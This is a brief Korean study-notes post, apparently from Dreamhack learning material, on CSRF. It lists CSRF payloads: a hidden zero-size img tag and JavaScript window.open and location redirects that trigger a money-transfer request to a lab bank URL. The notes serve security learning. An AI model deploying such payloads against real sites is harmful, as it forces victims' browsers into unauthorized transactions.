본문 바로가기

Dreamhack/공부

XSS / CSRF

 

 

CSRF

이론

 

실습

 

 

1. 이미지를 불러오는 img 태그 사용

2. 웹 페이지에 입력된 양식을 전송하는 form 태그를 사용

 

HTML

<img src='http://bank.dreamhack.io/sendmoney?to=dreamhack&amount=1337' width=0px height=0px>

Javascript

/* 새 창 띄우기 */
window.open('http://bank.dreamhack.io/sendmoney?to=dreamhack&amount=1337');
/* 현재 창 주소 옮기기 */
location.href = 'http://bank.dreamhack.io/sendmoney?to=dreamhack&amount=1337';
location.replace('http://bank.dreamhack.io/sendmoney?to=dreamhack&amount=1337');